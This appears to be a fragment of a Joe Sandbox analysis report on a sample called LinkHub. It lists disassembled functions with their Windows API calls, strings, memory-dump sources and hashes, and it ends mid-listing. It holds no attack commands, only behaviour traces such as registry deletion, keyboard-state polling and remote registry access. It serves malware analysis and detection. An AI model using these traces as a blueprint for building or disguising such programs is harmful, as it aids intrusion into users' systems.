                                                                    • Instruction Fuzzy Hash: 0981AC715083019FDB10CF24D894BABBBE9FB89314F08491EF98997292DB70D905CBB2
                                                                    Function 00CDC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(00D429C0,000000FF,00000000,00000030), ref: 00CDC973
                                                                    • SetMenuItemInfoW.USER32(00D429C0,00000004,00000000,00000030), ref: 00CDC9A8
                                                                    • Sleep.KERNEL32(000001F4), ref: 00CDC9BA
                                                                    • GetMenuItemCount.USER32(?), ref: 00CDCA00
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00CDCA1D
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00CDCA49
                                                                    • GetMenuItemID.USER32(?,?), ref: 00CDCA90
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CDCAD6
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CDCAEB
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CDCB0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                    • String ID: 0
                                                                    • API String ID: 1460738036-4108050209
                                                                    • Opcode ID: ded3cffbf6e11faa0ced7f9cf16dc030b4b7058ee36992bafe4ade4fae784717
                                                                    • Instruction ID: a403864201f8a22eff8b960be1d716706d7e54bfb8413ae46f38067fe6aab1bd
                                                                    • Opcode Fuzzy Hash: ded3cffbf6e11faa0ced7f9cf16dc030b4b7058ee36992bafe4ade4fae784717
                                                                    • Instruction Fuzzy Hash: D1616D7090024AABDF21CFA4DC89AAE7BB9FB05344F04005BFA65A3391D734AE11DB71
                                                                    Function 00CDE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CDE4D4
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CDE4FA
                                                                    • _wcslen.LIBCMT ref: 00CDE504
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00CDE554
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CDE570
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 1939486746-1459072770
                                                                    • Opcode ID: 24f3b0d6c6636d8fc1789806702ed841369a8dae3047c3ecab2aba62d030f1c6
                                                                    • Instruction ID: c1364854ff290203c361275131cc19cc98f2d024874d58a649add43a56a88ea3
                                                                    • Opcode Fuzzy Hash: 24f3b0d6c6636d8fc1789806702ed841369a8dae3047c3ecab2aba62d030f1c6
                                                                    • Instruction Fuzzy Hash: 384104725002087EEF01BBA49C4BFBF776CEF55710F10005AFA05A6292FA74DA01A3B5
                                                                    Function 00CFD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CFD6C4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00CFD6ED
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CFD7A8
                                                                      • Part of subcall function 00CFD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00CFD70A
                                                                      • Part of subcall function 00CFD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00CFD71D
                                                                      • Part of subcall function 00CFD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CFD72F
                                                                      • Part of subcall function 00CFD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CFD765
                                                                      • Part of subcall function 00CFD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CFD788
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CFD753
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2734957052-4033151799
                                                                    • Opcode ID: 8d84b6a234141a30d7ce59a2860385703f4f9065df72b4fd153184b3646d4bbc
                                                                    • Instruction ID: 9dda77fdfc1ca945744db1fd724290cf5689def68c1303fdc4755faa7dbafe80
                                                                    • Opcode Fuzzy Hash: 8d84b6a234141a30d7ce59a2860385703f4f9065df72b4fd153184b3646d4bbc
                                                                    • Instruction Fuzzy Hash: 8531847590121CBBD720AF90DC88EFFBB7DEF46710F000166B51AE7214DA709E459AB1
                                                                    Function 00CDEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00CDEFCB
                                                                      • Part of subcall function 00C8F215: timeGetTime.WINMM(?,?,00CDEFEB), ref: 00C8F219
                                                                    • Sleep.KERNEL32(0000000A), ref: 00CDEFF8
                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00CDF01C
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CDF03E
                                                                    • SetActiveWindow.USER32 ref: 00CDF05D
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CDF06B
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CDF08A
                                                                    • Sleep.KERNEL32(000000FA), ref: 00CDF095
                                                                    • IsWindow.USER32 ref: 00CDF0A1
                                                                    • EndDialog.USER32(00000000), ref: 00CDF0B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 8e947e686ce8157dc67b6f4dccc2d155ff8b3058f64caf06b66bbc50067844be
                                                                    • Instruction ID: c192ca43a62c7660e65ebd070f6f8e9d8b8a373d7b75228b9123da0fa8fe96a1
                                                                    • Opcode Fuzzy Hash: 8e947e686ce8157dc67b6f4dccc2d155ff8b3058f64caf06b66bbc50067844be
                                                                    • Instruction Fuzzy Hash: 5F219279100305BFE7106FA4EC89B267B6AF756744F00402BF606D33B2CB719D459675
                                                                    Function 00CDF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CDF374
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CDF38A
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDF39B
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CDF3AD
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CDF3BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2420728520-1007645807
                                                                    • Opcode ID: b8368ed5447a3338532382adeb4449bf4320842b2d525ca33fcd2485fc101d3d
                                                                    • Instruction ID: f6aba2093c4531b480d1b51c7cbab79aaabb852f1b74e93c8cc4657fb48c61af
                                                                    • Opcode Fuzzy Hash: b8368ed5447a3338532382adeb4449bf4320842b2d525ca33fcd2485fc101d3d
                                                                    • Instruction Fuzzy Hash: 0811A371A902597DD730A365CC4AFFF7ABCEBD2B40F00052A7916E20E0DAA05D49D9B1
                                                                    Function 00CDA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00CDA9D9
                                                                    • SetKeyboardState.USER32(?), ref: 00CDAA44
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00CDAA64
                                                                    • GetKeyState.USER32(000000A0), ref: 00CDAA7B
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00CDAAAA
                                                                    • GetKeyState.USER32(000000A1), ref: 00CDAABB
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00CDAAE7
                                                                    • GetKeyState.USER32(00000011), ref: 00CDAAF5
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00CDAB1E
                                                                    • GetKeyState.USER32(00000012), ref: 00CDAB2C
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00CDAB55
                                                                    • GetKeyState.USER32(0000005B), ref: 00CDAB63
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 03576418502754de0d09ed9d7084b911179033c2f05caf69b471d7c2accec6b5
                                                                    • Instruction ID: 2bc7307e5580bdfbc05b7052b709bfd5d00b75eb0522182378860f8b2b6ab322
                                                                    • Opcode Fuzzy Hash: 03576418502754de0d09ed9d7084b911179033c2f05caf69b471d7c2accec6b5
                                                                    • Instruction Fuzzy Hash: CE51D770A047842AFB35D7B08854BEABFB59F02380F09459BC6D65A3C2DA549F4CCB63
                                                                    Function 00CD662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00CD6649
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00CD6662
                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00CD66C0
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00CD66D0
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00CD66E2
                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00CD6736
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00CD6744
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00CD6756
                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00CD6798
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00CD67AB
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CD67C1
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CD67CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 93ee64d6964e185798d3d382733042716eeb487522e2c0db8df67e8d3d537797
                                                                    • Instruction ID: aaa0b0a3f6908e906e0a4bbafa7339f7eb861516ba0058d10ba762652989cb82
                                                                    • Opcode Fuzzy Hash: 93ee64d6964e185798d3d382733042716eeb487522e2c0db8df67e8d3d537797
                                                                    • Instruction Fuzzy Hash: 3C51F171A00209AFDB14CFA8DD85AAEBBB5FB48314F514129F519E7394D7719E04CB60
                                                                    Function 00C7146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C71802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C71488,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00C71865
                                                                    • DestroyWindow.USER32(?), ref: 00C71521
                                                                    • KillTimer.USER32(00000000,?,?,?,?,00C7145A,00000000,?), ref: 00C715BB
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00CB29B4
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00CB29E2
                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00CB29F9
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C7145A,00000000), ref: 00CB2A15
                                                                    • DeleteObject.GDI32(00000000), ref: 00CB2A27
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: 52b3144c5e27ae4e3425569406654dbbb927ac6c74810a59d053f9c45be37968
                                                                    • Instruction ID: 3f4f8d8ba8719d90b9fc2bffb196283e82bbb9b4e8616e62edbcb40e385a5068
                                                                    • Opcode Fuzzy Hash: 52b3144c5e27ae4e3425569406654dbbb927ac6c74810a59d053f9c45be37968
                                                                    • Instruction Fuzzy Hash: B761AF34504701DFDB3A8F18D848B3677B2FB81312F588519E89B96670C330AA80DF60
                                                                    Function 00C72128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C72234: GetWindowLongW.USER32(?,000000EB), ref: 00C72242
                                                                    • GetSysColor.USER32(0000000F), ref: 00C72152
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 1df3fb8387de25dc4405ce9ab49dbab3f48d5caa8e650242836350bc5e7c68d9
                                                                    • Instruction ID: 36b6ef6cd9f1ada958e1e188f68bd253e7f4c4c23586f08528a8cfe3412b1d76
                                                                    • Opcode Fuzzy Hash: 1df3fb8387de25dc4405ce9ab49dbab3f48d5caa8e650242836350bc5e7c68d9
                                                                    • Instruction Fuzzy Hash: D641A035100744AFDB245F689C48BBE3776BB46331F958255FABA8B2E1C7318E42DB21
                                                                    Function 00CDA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00CC0D31,00000001,0000138C,00000001,00000001,00000001,?,00CEEEAE,00D42430), ref: 00CDA091
                                                                    • LoadStringW.USER32(00000000,?,00CC0D31,00000001), ref: 00CDA09A
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00CC0D31,00000001,0000138C,00000001,00000001,00000001,?,00CEEEAE,00D42430,?), ref: 00CDA0BC
                                                                    • LoadStringW.USER32(00000000,?,00CC0D31,00000001), ref: 00CDA0BF
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CDA1E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 747408836-2268648507
                                                                    • Opcode ID: 137fb3803086f5fa82d0463c37118752cc9a6f2c44501ded5f7073483897737a
                                                                    • Instruction ID: e0a08ebcdccef8a79ecdde731561bf579b5bf0c2601c316a52b86b5808acf56a
                                                                    • Opcode Fuzzy Hash: 137fb3803086f5fa82d0463c37118752cc9a6f2c44501ded5f7073483897737a
                                                                    • Instruction Fuzzy Hash: 9141417280060DABCB14EBE0DD46EEEB778AF14300F504066F609B21A2DB756F49EB61
                                                                    Function 00CD0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CD1093
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CD10AF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CD10CB
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CD10F5
                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00CD111D
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CD1128
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CD112D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 323675364-22481851
                                                                    • Opcode ID: d87b622a8b608e99cf2d0f27cca6fce5a8779b07e883ca8ac098711df78a02cf
                                                                    • Instruction ID: 5fa90a8fd0001e4c0e418d2b36300c5b89a57ff6a2de447b43cd20d638a8f597
                                                                    • Opcode Fuzzy Hash: d87b622a8b608e99cf2d0f27cca6fce5a8779b07e883ca8ac098711df78a02cf
                                                                    • Instruction Fuzzy Hash: FB410A76C10229ABDF11EBA4DC459EEB778FF14750F44802AEA15A3260EB319E04DB60
                                                                    Function 00D04A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D04AD9
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00D04AE0
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D04AF3
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00D04AFB
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D04B06
                                                                    • DeleteDC.GDI32(00000000), ref: 00D04B10
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00D04B1A
                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00D04B30
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00D04B3C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 584502e597c2e8c0c8ab23053df635bed6901aaaa274548a3444150ba8ddf6e3
                                                                    • Instruction ID: fcb38b49b07e2c9d559d94292f053e5c82336e18edea853bc921ae950c093bfc
                                                                    • Opcode Fuzzy Hash: 584502e597c2e8c0c8ab23053df635bed6901aaaa274548a3444150ba8ddf6e3
                                                                    • Instruction Fuzzy Hash: 73313872100219ABDF119FA4DC08FDA3BAAEF0D324F150212FA59E62E0C775D860DBA4
                                                                    Function 00CF468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00CF46B9
                                                                    • CoInitialize.OLE32(00000000), ref: 00CF46E7
                                                                    • CoUninitialize.OLE32 ref: 00CF46F1
                                                                    • _wcslen.LIBCMT ref: 00CF478A
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00CF480E
